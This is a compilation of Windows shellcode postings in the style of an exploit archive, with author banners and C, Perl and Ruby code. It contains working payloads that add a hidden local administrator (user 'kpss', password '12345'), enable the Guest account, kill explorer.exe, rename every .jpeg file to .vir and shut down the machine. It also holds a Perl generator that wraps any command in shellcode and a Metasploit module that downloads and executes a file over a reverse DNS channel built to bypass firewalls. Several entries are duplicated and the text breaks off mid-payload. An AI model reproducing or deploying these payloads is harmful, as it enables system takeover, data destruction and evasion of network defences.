===================================================== win32 generic - add new local administrator 326 bytes ===================================================== /* Title: generic win32 - add new local administrator 326 bytes Author: Anastasios Monachos (secuid0) - anastasiosm[at]gmail[dot]com Method: Dynamic opcode, encoded shellcode Tested on: WinXP Pro SP3 (EN) 32bit - Build 2600.100427-1636 and Build 2600.080413-2111 Greetz: offsec team, inj3ct0r team, hdm */
win32 generic - add new local administrator 326 bytes
win32/xp pro sp3 (EN) 32-bit - add new local administrator 113 bytes
==================================================================== win32/xp pro sp3 (EN) 32-bit - add new local administrator 113 bytes ==================================================================== /* Title: win32/xp pro sp3 (EN) 32-bit - add new local administrator 113 bytes Author: Anastasios Monachos (secuid0) - anastasiosm[at]gmail[dot]com Method: Hardcoded opcodes (kernel32.winexec@7c8623ad, kernel32.exitprocess@7c81cafa) Tested on: WinXP Pro SP3 (EN) 32bit - Build 2600.080413-2111 Greetz: offsec and inj3ct0r teams */
win32/xp pro sp3 MessageBox shellcode
/*
Title: win32/xp pro sp3 MessageBox shellcode 11 bytes
Author: d3c0der - d3c0der[at]hotmail[dot]com
Tested on: WinXP Pro SP3 (EN) # ( runs a MessageBox that shows an error message )
website : Www.AttackerZ.ir
spt : All friends ;)
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
char code[] = "\x33\xd2\x52\x52\x52\x52\xe8\xbe\xe9\x44\x7d";
int main(int argc, char **argv)
{
((void (*)())code)();
return 0;
}
Activate Guest Account Shellcode
#(+) Exploit Title: win32/xp sp3 Activate Guest Account Shellcode 67 Bytes
#(+) Author : ^Xecuti0n3r
#(+) E-mail : xecuti0n3r()yahoo.com
#(+) Category : win32-Shellcodes
#(+) Tested on : Windows Xp 32 bit
Windows Magnifier Shellcode
#(+) Exploit Title: win32/xp sp3 Windows Magnifier Shellcode 52 bytes
#(+) Author : ^Xecuti0n3r
#(+) E-mail : xecuti0n3r()yahoo.com
#(+) Category : win32-Shellcodes
#(+) Tested on : Windows Xp 32 bit
win32/xp sp3 Force Kill explorer.exe process
#(+) Exploit Title: win32/xp sp3 Force Kill explorer.exe process Shellcode 73 Bytes
#(+) Author : ^Xecuti0n3r
#(+) E-mail : xecuti0n3r()yahoo.com
#(+) Category : win32-Shellcodes
#(+) Tested on : Windows Xp 32 bit
VB6_vbaExceptHandler - SEH (calc.exe) ShellCode
# =========[ Sh31LC0d3.C ]=====>
/*
###
# Title : Win32 VB6_vbaExceptHandler - SEH (calc.exe) ShellCode - 149 Bytes
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com | ked-h@exploit-id.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# platform : Win32
# Target : VB6 ExE Project >*> Command : Shell ("calc.exe")
# Tested on : Windows XP SP3 France
###
*/
download & execute file via reverse DNS channel
# Shellcode: download and execute file via reverse DNS channel
#
#
# Features:
# * Windows 7 tested
# * UAC without work (svchost.exe makes requests via getaddrinfo)
# * Firewall/Router/Nat/Proxy bypass reverse connection (like dnscat do, but without sockets and stable!)
# * NO SOCKET
#
# DNS handler - http://dsecrg.com/files/pub/tools/revdns.zip
#
#
# By Alexey Sintsov
# [DSecRG]
# a.sintsov [sobachka] dsecrg.com
# dookie [sobachka] inbox.ru
#
# P.S. Works on Vista/7/2008.
# Does not work on XP/2003 because there is no IPv6 by default;
# it can work on XP/2003 if IPv6 is installed
# (it does not need to be enabled, just installed).
require 'msf/core'
module Metasploit3
include Msf::Payload::Windows
include Msf::Payload::Single
def initialize(info = {})
super(update_info(info,
'Name' => 'DNS_DOWNLOAD_EXEC',
'Version' => '0.01',
'Description' => 'Download and Exec (via DNS)',
'Author' => [ 'Alexey Sintsov' ],
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86,
'Payload' =>
{
'Offsets' =>{ },
'Begin' => "\xeb\x02\xeb\x7A\xe8\xf9\xff\xff\xff\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\xFF\x47\x65\x74\x54\x65\x6d\x70\x50\x61\x74\x68\x41\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x57\x69\x6E\x45\x78\x65\x63\xFF\x45\x78\x69\x74\x54\x68\x72\x65\x61\x64\xff\x4C\x6F\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\xFF\x77\x73\x32\x5f\x33\x32\xFF\x57\x53\x41\x53\x74\x61\x72\x74\x75\x70\xFF\x67\x65\x74\x61\x64\x64\x72\x69\x6e\x66\x6f\xFF\x6d\x73\x76\x63\x72\x74\xFF\x66\x6f\x70\x65\x6e\xFF\x66\x77\x72\x69\x74\x65\xFF\xEB\x13\x66\x63\x6c\x6f\x73\x65\xFF",
'Payload1' => "\xFF\x5e\x33\xc9\xb1\xe4\x8b\xd1\x2b\xe2\x8b\xfc\xf3\xa4\x33\xc0\x8b\xfc\x8A\x04\x39\x3A\xCA\x74\x0D\x3C\xFF\x74\x03\x41\xEB\xF2\x88\x2C\x39\x41\xEB\xEC\xeb\x78\x31\xC9\x64\x8B\x71\x30\x8B\x76\x0C\x8B\x76\x1C\x8B\x5e\x08\x8B\x7E\x20\x33\xed\x83\xc5\x18\x8B\x36\x66\x39\x0C\x2F\x75\xed\x8B\x73\x3C\x8B\x74\x1E\x78\x03\xF3\x8B\x7E\x20\x03\xFB\x8B\x4E\x14\x33\xED\x56\x57\x51\x8B\x3F\x03\xFB\x8B\xF2\x6A\x0E\x59\xF3\xA6\x74\x08\x59\x5F\x83\xC7\x04\x45\xE2\xE9\x59\x5F\x5E\x8B\xCD\x8B\x46\x24\x03\xC3\xD1\xE1\x03\xC1\x33\xC9\x66\x8B\x08\x8B\x46\x1C\x03\xC3\xC1\xE1\x02\x03\xC8\x8B\x01\x03\xC3\x8B\xFA\x8B\xF7\x83\xC6\x0E\x8B\xD0\x6A\x04\x59\xC3\x8b\xd4\xe8\x81\xff\xff\xff\x50\x33\xc0\xb0\x0f\x03\xf8\x57\x53\xff\xd2\x50\x33\xc0\xb0\x14\x03\xf8\x57\x53\xff\x54\x24\x0c\x50\x33\xc0\xb0\x08\x03\xf8\x57\x53\xff\x54\x24\x10\x50\x33\xc0\xb0\x0b\x03\xf8\x57\x53\xff\x54\x24\x14\x50\x8b\xc7\x83\xc0\x0d\x50\xff\x54\x24\x04\x8b\xd8\x33\xc0\xb0\x14\x03\xf8\x57\x53\xff\x54\x24\x18\x50\x33\xc0\xb0\x0b\x03\xf8\x57\x53\xff\x54\x24\x1C\x50\x83\xc7\x0c\x57\xff\x54\x24\x0c\x8b\xd8\x83\xc7\x07\x57\x53\xff\x54\x24\x20\x50\x83\xc7\x06\x57\x53\xff\x54\x24\x24\x50\x50\x8b\xf4\x83\xc7\x09\x57\x53\xff\x54\x24\x2c\x50\x33\xc0\xb4\x03\x2b\xe0\x8b\xcc\x51\x50\xff\x56\x20\x03\xe0\x59\x59\x8b\xc8\xb8",
'Payload2' => "\xba\x01\x01\x01\x01\x2b\xc2\x50\xb8\x79\x78\x6f\x2e\x50\x2b\xe1\x8b\xcc\x33\xc0\xb0\x77\xb4\x62\x50\x54\x51\xff\x56\x08\x33\xd2\xb6\x03\xb2\x0c\x03\xe2\x50\x33\xc0\xb4\x05\x2b\xe0\x54\x33\xc0\xb0\x02\xb4\x02\x50\xff\x56\x10\x32\xc9\x50\x80\xf9\x80\x74\x04\xfe\xc1\xeb\xf6\x83\xc4\x10\xb0\x06\x50\xb0\x01\x50\xb0\x17\x50\x83\xec\x04\x8B\xEC\x83\xC7\x07\x83\xEC\x20\x33\xC0\x8A\x0C\x38\x88\x0C\x04\x40\x84\xC9\x75\xF5\x33\xc0\xb9\x61\x61\x61\x61\x8b\xd9\x51\x8b\xd4\x83\xc2\x7f\x52\x33\xd2\x55\x52\x8b\xd4\x83\xc2\x0c\x52\xff\x56\x0c\x59\x51\x85\xc0\x75\xe7\x33\xDB\xB3\xee\x2B\xE3\x50\x8b\xc5\x8b\x40\x5b\x8b\x48\x18\x8b\x50\x1c\x83\xC1\x08\x33\xC0\x33\xFF\x66\x8B\x01\x66\x3d\xff\xff\x74\x7f\x8b\xf8\xc1\xef\x08\x32\xe4\x5b\x03\xfb\x57\x66\x8B\x59\x02\x66\x89\x5c\x04\x04\x8B\x79\x04\x89\x7C\x04\x06\x8B\x79\x08\x89\x7C\x04\x0A\x8B\x79\x0C\x89\x7C\x04\x0E\x8b\xc2\x85\xc0\x75\xbb\x58\xff\x76\xf8\x50\xb0\x01\x50\x8b\xc4\x83\xc0\x0c\x50\xff\x56\x04\x33\xc0\xb0\xee\x03\xe0\x58\x58\x58\x58\x58\x2D\x61\x61\x61\x61\xC0\xE4\x04\x02\xC4\x3C\xFF\x75\x13\x8A\xE0\x40\xc1\xe8\x10\x3c\x1a\x75\x04\xfe\xc4\x32\xc0\xc1\xe0\x10\xeb\x08\x40\x8a\xe0\xC0\xEC\x04\x24\x0F\x05\x61\x61\x61\x61\x50\xe9\x46\xff\xff\xff\x8b\x46\xf8\x50\xff\x56\xfc\x66\xb8\x22\x05\x03\xe0"+"\x68\x2f\x63\x20\x22\x68\x63\x6d\x64\x20\x8b\xcc\x41\x8a\x01\x84\xc0\x75\xf9\xc6\x01\x22\x88\x41\x01"+"\x33\xc0\x8b\xcc\x50\x51\xff\x56\x1c\x50\xff\x56\x18"
}
))
# We use rtlExitThread(0)
deregister_options('EXITFUNC')
# Register the domain and cmd options
register_options(
[
OptString.new('DOMAIN', [ true, "The domain name to use (9 bytes - maximum)" ]),
OptString.new('FILE', [ true, "Filename extension (default VBS)" ]),
], self.class)
end
#
# Constructs the payload
#
def generate_stage
domain = datastore['DOMAIN'] || ''
extens = datastore['FILE'] || 'vbs'
# \"x66\x79\x66\x01"
extLen=extens.length
while extens.length<4
extens=extens+"\x01"
end
i=0
while i<extLen
extens[i,1]=(extens[i].ord+1).chr
i=i+1
end
while domain.length<10
domain=domain+"\xFF"
end
domain="\x2e"+domain
payload=module_info['Payload']['Begin'] + domain + module_info['Payload']['Payload1'] + extens + module_info['Payload']['Payload2']
return payload
end
end
#
#
# Features:
# * Windows 7 tested
# * UAC without work (svchost.exe makes requests via getaddrinfo)
# * Firewall/Router/Nat/Proxy bypass reverse connection (like dnscat do, but without sockets and stable!)
# * NO SOCKET
#
# DNS handler - http://dsecrg.com/files/pub/tools/revdns.zip
#
#
# By Alexey Sintsov
# [DSecRG]
# a.sintsov [sobachka] dsecrg.com
# dookie [sobachka] inbox.ru
#
# P.S. Works on Vista/7/2008.
# Does not work on XP/2003 because there is no IPv6 by default;
# it can work on XP/2003 if IPv6 is installed
# (it does not need to be enabled, just installed).
require 'msf/core'
module Metasploit3
include Msf::Payload::Windows
include Msf::Payload::Single
def initialize(info = {})
super(update_info(info,
'Name' => 'DNS_DOWNLOAD_EXEC',
'Version' => '0.01',
'Description' => 'Download and Exec (via DNS)',
'Author' => [ 'Alexey Sintsov' ],
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86,
'Payload' =>
{
'Offsets' =>{ },
'Begin' => "\xeb\x02\xeb\x7A\xe8\xf9\xff\xff\xff\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\xFF\x47\x65\x74\x54\x65\x6d\x70\x50\x61\x74\x68\x41\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x57\x69\x6E\x45\x78\x65\x63\xFF\x45\x78\x69\x74\x54\x68\x72\x65\x61\x64\xff\x4C\x6F\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\xFF\x77\x73\x32\x5f\x33\x32\xFF\x57\x53\x41\x53\x74\x61\x72\x74\x75\x70\xFF\x67\x65\x74\x61\x64\x64\x72\x69\x6e\x66\x6f\xFF\x6d\x73\x76\x63\x72\x74\xFF\x66\x6f\x70\x65\x6e\xFF\x66\x77\x72\x69\x74\x65\xFF\xEB\x13\x66\x63\x6c\x6f\x73\x65\xFF",
'Payload1' => "\xFF\x5e\x33\xc9\xb1\xe4\x8b\xd1\x2b\xe2\x8b\xfc\xf3\xa4\x33\xc0\x8b\xfc\x8A\x04\x39\x3A\xCA\x74\x0D\x3C\xFF\x74\x03\x41\xEB\xF2\x88\x2C\x39\x41\xEB\xEC\xeb\x78\x31\xC9\x64\x8B\x71\x30\x8B\x76\x0C\x8B\x76\x1C\x8B\x5e\x08\x8B\x7E\x20\x33\xed\x83\xc5\x18\x8B\x36\x66\x39\x0C\x2F\x75\xed\x8B\x73\x3C\x8B\x74\x1E\x78\x03\xF3\x8B\x7E\x20\x03\xFB\x8B\x4E\x14\x33\xED\x56\x57\x51\x8B\x3F\x03\xFB\x8B\xF2\x6A\x0E\x59\xF3\xA6\x74\x08\x59\x5F\x83\xC7\x04\x45\xE2\xE9\x59\x5F\x5E\x8B\xCD\x8B\x46\x24\x03\xC3\xD1\xE1\x03\xC1\x33\xC9\x66\x8B\x08\x8B\x46\x1C\x03\xC3\xC1\xE1\x02\x03\xC8\x8B\x01\x03\xC3\x8B\xFA\x8B\xF7\x83\xC6\x0E\x8B\xD0\x6A\x04\x59\xC3\x8b\xd4\xe8\x81\xff\xff\xff\x50\x33\xc0\xb0\x0f\x03\xf8\x57\x53\xff\xd2\x50\x33\xc0\xb0\x14\x03\xf8\x57\x53\xff\x54\x24\x0c\x50\x33\xc0\xb0\x08\x03\xf8\x57\x53\xff\x54\x24\x10\x50\x33\xc0\xb0\x0b\x03\xf8\x57\x53\xff\x54\x24\x14\x50\x8b\xc7\x83\xc0\x0d\x50\xff\x54\x24\x04\x8b\xd8\x33\xc0\xb0\x14\x03\xf8\x57\x53\xff\x54\x24\x18\x50\x33\xc0\xb0\x0b\x03\xf8\x57\x53\xff\x54\x24\x1C\x50\x83\xc7\x0c\x57\xff\x54\x24\x0c\x8b\xd8\x83\xc7\x07\x57\x53\xff\x54\x24\x20\x50\x83\xc7\x06\x57\x53\xff\x54\x24\x24\x50\x50\x8b\xf4\x83\xc7\x09\x57\x53\xff\x54\x24\x2c\x50\x33\xc0\xb4\x03\x2b\xe0\x8b\xcc\x51\x50\xff\x56\x20\x03\xe0\x59\x59\x8b\xc8\xb8",
'Payload2' => "\xba\x01\x01\x01\x01\x2b\xc2\x50\xb8\x79\x78\x6f\x2e\x50\x2b\xe1\x8b\xcc\x33\xc0\xb0\x77\xb4\x62\x50\x54\x51\xff\x56\x08\x33\xd2\xb6\x03\xb2\x0c\x03\xe2\x50\x33\xc0\xb4\x05\x2b\xe0\x54\x33\xc0\xb0\x02\xb4\x02\x50\xff\x56\x10\x32\xc9\x50\x80\xf9\x80\x74\x04\xfe\xc1\xeb\xf6\x83\xc4\x10\xb0\x06\x50\xb0\x01\x50\xb0\x17\x50\x83\xec\x04\x8B\xEC\x83\xC7\x07\x83\xEC\x20\x33\xC0\x8A\x0C\x38\x88\x0C\x04\x40\x84\xC9\x75\xF5\x33\xc0\xb9\x61\x61\x61\x61\x8b\xd9\x51\x8b\xd4\x83\xc2\x7f\x52\x33\xd2\x55\x52\x8b\xd4\x83\xc2\x0c\x52\xff\x56\x0c\x59\x51\x85\xc0\x75\xe7\x33\xDB\xB3\xee\x2B\xE3\x50\x8b\xc5\x8b\x40\x5b\x8b\x48\x18\x8b\x50\x1c\x83\xC1\x08\x33\xC0\x33\xFF\x66\x8B\x01\x66\x3d\xff\xff\x74\x7f\x8b\xf8\xc1\xef\x08\x32\xe4\x5b\x03\xfb\x57\x66\x8B\x59\x02\x66\x89\x5c\x04\x04\x8B\x79\x04\x89\x7C\x04\x06\x8B\x79\x08\x89\x7C\x04\x0A\x8B\x79\x0C\x89\x7C\x04\x0E\x8b\xc2\x85\xc0\x75\xbb\x58\xff\x76\xf8\x50\xb0\x01\x50\x8b\xc4\x83\xc0\x0c\x50\xff\x56\x04\x33\xc0\xb0\xee\x03\xe0\x58\x58\x58\x58\x58\x2D\x61\x61\x61\x61\xC0\xE4\x04\x02\xC4\x3C\xFF\x75\x13\x8A\xE0\x40\xc1\xe8\x10\x3c\x1a\x75\x04\xfe\xc4\x32\xc0\xc1\xe0\x10\xeb\x08\x40\x8a\xe0\xC0\xEC\x04\x24\x0F\x05\x61\x61\x61\x61\x50\xe9\x46\xff\xff\xff\x8b\x46\xf8\x50\xff\x56\xfc\x66\xb8\x22\x05\x03\xe0"+"\x68\x2f\x63\x20\x22\x68\x63\x6d\x64\x20\x8b\xcc\x41\x8a\x01\x84\xc0\x75\xf9\xc6\x01\x22\x88\x41\x01"+"\x33\xc0\x8b\xcc\x50\x51\xff\x56\x1c\x50\xff\x56\x18"
}
))
# We use rtlExitThread(0)
deregister_options('EXITFUNC')
# Register the domain and cmd options
register_options(
[
OptString.new('DOMAIN', [ true, "The domain name to use (9 bytes - maximum)" ]),
OptString.new('FILE', [ true, "Filename extension (default VBS)" ]),
], self.class)
end
#
# Constructs the payload
#
def generate_stage
domain = datastore['DOMAIN'] || ''
extens = datastore['FILE'] || 'vbs'
# \"x66\x79\x66\x01"
extLen=extens.length
while extens.length<4
extens=extens+"\x01"
end
i=0
while i<extLen
extens[i,1]=(extens[i].ord+1).chr
i=i+1
end
while domain.length<10
domain=domain+"\xFF"
end
domain="\x2e"+domain
payload=module_info['Payload']['Begin'] + domain + module_info['Payload']['Payload1'] + extens + module_info['Payload']['Payload2']
return payload
end
end
Add Admin Shellcode 112 bytes
# Title : win32/PerfectXp-pc1/sp3 (Tr) Add Admin Shellcode 112 bytes
# Author : KaHPeSeSe
# Screenshot : http://i53.tinypic.com/289yamq.jpg
# Desc. : usr: kpss , pass: 12345 , localgroup: Administrator
# Tested on : PERFECT XP PC1 / SP3
# Date : 18/07/2011
# Not : a.q kpss :((
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main(){
unsigned char shellcode[]=
"\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x4e\x53\xbb\x0d\x25\x86\x7c"
"\xff\xd3\x31\xc0\x50\xbb\x12\xcb\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff"
"\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73"
"\x65\x72\x20\x6b\x70\x73\x73\x20\x31\x32\x33\x34\x35\x20\x2f\x61\x64"
"\x64\x20\x26\x26\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f"
"\x75\x70\x20\x41\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x73"
"\x20\x2f\x61\x64\x64\x20\x6b\x70\x73\x73";
printf("Size = %d bytes\n", strlen(shellcode));
((void (*)())shellcode)();
return 0;
}
# Author : KaHPeSeSe
# Screenshot : http://i53.tinypic.com/289yamq.jpg
# Desc. : usr: kpss , pass: 12345 , localgroup: Administrator
# Tested on : PERFECT XP PC1 / SP3
# Date : 18/07/2011
# Not : a.q kpss :((
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main(){
unsigned char shellcode[]=
"\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x4e\x53\xbb\x0d\x25\x86\x7c"
"\xff\xd3\x31\xc0\x50\xbb\x12\xcb\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff"
"\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73"
"\x65\x72\x20\x6b\x70\x73\x73\x20\x31\x32\x33\x34\x35\x20\x2f\x61\x64"
"\x64\x20\x26\x26\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f"
"\x75\x70\x20\x41\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x73"
"\x20\x2f\x61\x64\x64\x20\x6b\x70\x73\x73";
printf("Size = %d bytes\n", strlen(shellcode));
((void (*)())shellcode)();
return 0;
}
Win32 / Windows7 Sp1 - rename .jpeg to .vir
# Exploit Title: Win32 / Windows7 Sp1 - rename .jpeg to .vir (57 bytes)
# Date: July, 23 2011
# Author: Theuzuki.'
# Vendor or Software Link: -
# Version: -
# Category:: shellcodes
# Google dork: -
# Tested on: Windows 7 sp 1
# Demo site: -
==================================================
Made by:
___________.__ ____ ___ __ .__
\__ ___/| |__ ____ | | \__________ __| | _|__|
| | | | \_/ __ \| | /\___ / | \ |/ / |
| | | Y \ ___/| | / / /| | / <| |
|____| |___| /\___ >______/ /_____ \____/|__|_ \__|
\/ \/Rats Crew \/ TheCod3r \/
Mail: Uzuki@live.de
Website: www.thecoder.co.tv
Nicknames: TheUzuki.' / TheCod3r
Greeting: TheRats Crew
==================================================
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
char code[] = "\xeb\x16\x5b\x31\xc0\x50"
"\x53\xbb\x39\xe7\x99\x75\xff\xd3\x31\xc0"
"\x50\xbb\x6f\x2a\x96\x75\xff\xd3\xe8\xe5"
"\xff\xff\xff\x63\x6d\x64\x2e\x65\x78\x65"
"\x20\x52\x45\x4e\x20\x2a\x2e\x6a\x70\x65"
"\x67\x20\x2a\x2e\x76\x69\x72\x00";
int main(int argc, char **argv)
{
((void (*)())code)();
printf("Renaming all .jpeg files to .vir files");
return 0;
}
# Date: July, 23 2011
# Author: Theuzuki.'
# Vendor or Software Link: -
# Version: -
# Category:: shellcodes
# Google dork: -
# Tested on: Windows 7 sp 1
# Demo site: -
==================================================
Made by:
___________.__ ____ ___ __ .__
\__ ___/| |__ ____ | | \__________ __| | _|__|
| | | | \_/ __ \| | /\___ / | \ |/ / |
| | | Y \ ___/| | / / /| | / <| |
|____| |___| /\___ >______/ /_____ \____/|__|_ \__|
\/ \/Rats Crew \/ TheCod3r \/
Mail: Uzuki@live.de
Website: www.thecoder.co.tv
Nicknames: TheUzuki.' / TheCod3r
Greeting: TheRats Crew
==================================================
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
char code[] = "\xeb\x16\x5b\x31\xc0\x50"
"\x53\xbb\x39\xe7\x99\x75\xff\xd3\x31\xc0"
"\x50\xbb\x6f\x2a\x96\x75\xff\xd3\xe8\xe5"
"\xff\xff\xff\x63\x6d\x64\x2e\x65\x78\x65"
"\x20\x52\x45\x4e\x20\x2a\x2e\x6a\x70\x65"
"\x67\x20\x2a\x2e\x76\x69\x72\x00";
int main(int argc, char **argv)
{
((void (*)())code)();
printf("Renaming all .jpeg files to .vir files");
return 0;
}
win32/ 7 sp1 MessageBox
# Exploit Title: win32/ 7 sp1 MessageBox
# Date: July, 23 2011
# Author: Theuzuki.'
# Vendor or Software Link: -
# Version: -
# Category:: shellcodes
# Google dork: -
# Tested on: Windows 7 sp 1
# Demo site: -
==================================================
Discovered by:
___________.__ ____ ___ __ .__
\__ ___/| |__ ____ | | \__________ __| | _|__|
| | | | \_/ __ \| | /\___ / | \ |/ / |
| | | Y \ ___/| | / / /| | / <| |
|____| |___| /\___ >______/ /_____ \____/|__|_ \__|
\/ \/ Rats Crew \/ TheCod3r\/
Mail: Uzuki@live.de
Website: www.thecoder.co.tv
Nicknames: TheUzuki.' / TheCod3r
Greeting: TheRats Crew
==================================================
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
char code[] = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x2a\x59\xbb\x04\x28\x96\x75\x51\xff\xd3\xeb\x2f\x59\x51\x50\xbb\xd7\x17\x96\x75\xff\xd3\xeb\x34\x59\x31\xd2\x52\x51\x51\x52\xff\xd0\x31\xd2\x50\xb8\x6f\x2a\x96\x75\xff\xd0\xe8\xd1\xff\xff\xff\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x00\xe8\xcc\xff\xff\xff\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x00\xe8\xc7\xff\xff\xff\x54\x65\x73\x65\x64\x20\x66\x6f\x72\x20\x48\x61\x63\x6b\x69\x6e\x67\x20\x77\x69\x6e\x37\x20\x2d\x20\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x00";
int main(int argc, char **argv)
{
((void (*)())code)();
printf("Printing MsgBox with Tesed for Hacking win7 - MessageBox");
return 0;
}
# Date: July, 23 2011
# Author: Theuzuki.'
# Vendor or Software Link: -
# Version: -
# Category:: shellcodes
# Google dork: -
# Tested on: Windows 7 sp 1
# Demo site: -
==================================================
Discovered by:
___________.__ ____ ___ __ .__
\__ ___/| |__ ____ | | \__________ __| | _|__|
| | | | \_/ __ \| | /\___ / | \ |/ / |
| | | Y \ ___/| | / / /| | / <| |
|____| |___| /\___ >______/ /_____ \____/|__|_ \__|
\/ \/ Rats Crew \/ TheCod3r\/
Mail: Uzuki@live.de
Website: www.thecoder.co.tv
Nicknames: TheUzuki.' / TheCod3r
Greeting: TheRats Crew
==================================================
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
char code[] = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x2a\x59\xbb\x04\x28\x96\x75\x51\xff\xd3\xeb\x2f\x59\x51\x50\xbb\xd7\x17\x96\x75\xff\xd3\xeb\x34\x59\x31\xd2\x52\x51\x51\x52\xff\xd0\x31\xd2\x50\xb8\x6f\x2a\x96\x75\xff\xd0\xe8\xd1\xff\xff\xff\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x00\xe8\xcc\xff\xff\xff\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x00\xe8\xc7\xff\xff\xff\x54\x65\x73\x65\x64\x20\x66\x6f\x72\x20\x48\x61\x63\x6b\x69\x6e\x67\x20\x77\x69\x6e\x37\x20\x2d\x20\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x00";
int main(int argc, char **argv)
{
((void (*)())code)();
printf("Printing MsgBox with Tesed for Hacking win7 - MessageBox");
return 0;
}
Command Execution exploit/shellcode
#!/usr/bin/perl
system("cls");
sub logo(){
print q'
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
1 ______ 0
0 .-" "-. 1
1 / KedAns-Dz \ =-=-=-=-=-=-=-=-=-=-=-| 0
0 Algerian HaCker | | > Site : 1337day.com | 1
1 --------------- |, .-. .-. ,| > Twitter : @kedans | 0
0 | )(_o/ \o_)( | > ked-h@hotmail.com | 1
1 |/ /\ \| =-=-=-=-=-=-=-=-=-=-=| 0
0 (@_ (_ ^^ _) HaCkerS-StreeT-Team 1
1 _ ) \_______\__|IIIIII|__/_______________________ 0
0 (_)@8@8{}<________|-\IIIIII/-|________________________> 1
1 )_/ \ / 0
0 (@ `--------` © 2011, Inj3ct0r Team 1
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0
0 Windows/32bit - Command Execution Exploit/ShellCode - 44 Bytes + CMD 1
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0
';
}
logo();
###
# Title : win32/xp sp3 Command Execution exploit/shellcode - 44 Bytes + CMD
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Web Site : www.1337day.com * www.exploit-id.com * www.09exploit.com
# Twitter page : twitter.com/kedans
# platform : win32
# Impact : Command Execution / Shellcode maker
# Tested on : Windows XP sp3 Fr
###
# (~) Greetings To : Caddy-Dz (+) JaGo-Dz (+) Dr.Ride (+) All My Friends
###
$ARGC=@ARGV;
if ($ARGC!=1) {
print "\n [!] Usage: perl $0 [Command] \n\n";
die " [*] f.ex: perl $0 shutdown -s -t 18 \n";
}
my $CMD = shift;
my $header = q'
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main(){
unsigned char shellcode[]=
';
my $sh = q'
"\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x29\x53\xbb\xad\x23\x86\x7c".
"\xff\xd3\x31\xc0\x50\xbb\xfa\xca\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff".
"\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20'.$CMD.'"';
my $end = q'
printf("Size = %d bytes\n", strlen(shellcode));
((void (*)())shellcode)();
return 0;
}
';
print $header.$sh.$end;
Alphanumeric Shutdown 18s
/*
# Title : win32/xp sp3 Alphanumeric Shutdown 18s - Shellcode - 534 Bytes
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com | ked-h@exploit-id.com
# Impact : Shutdown at 18 s [~ CMD : shutdown -s -t 18]
# Tested on : Windows XP sp3 Fr
*/
#include <stdio.h>
char shell[]=
"\x89\xE3" // MOV EBX,ESP
"\xDB\xC2" // FCMOVNB ST,ST(2)
"\xD9\x73\xF4" // FSTENV (28-BYTE) PTR DS:[EBX-C]
"\x5E" // POP ESI
// Start Alphanumeric Payload
"VYIIIIIIIIIICCCCCC7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIOKEoDFPNEsFQIYLqEeKjKcIICDDdIdQJNcKrGtFQQJDKGsQJF"
"THdMkIONBPaG3GPGBB2HMKuDCC0OYNnEaMDH9O3LyQOHoJWCzDmP8KGIkLXGnGFIlDlMOOdEnFNQsHgEBJ0PZFHQwKaMKF5OwLCD4D"
"QP5DtJPE7OuP5JvJCMeBmCcDsQQKTQJBDKIBSEDOlQbIKK5MMBwEoJYN4KlHtMYJFDtKuBRKiBXOzBlJuBUIBLIKbPeMqKQEpFxNRP1"
"CjHFGGOTKLNmIpDLKLG2D6O6L2DoKLOpGfNNJqLzQ3GKKdPlMrQoL3NHHnFDOjIyPJNkOSIzFSD4EVCPKaE1FPFKOLQdNPPQHyD6KzQI"
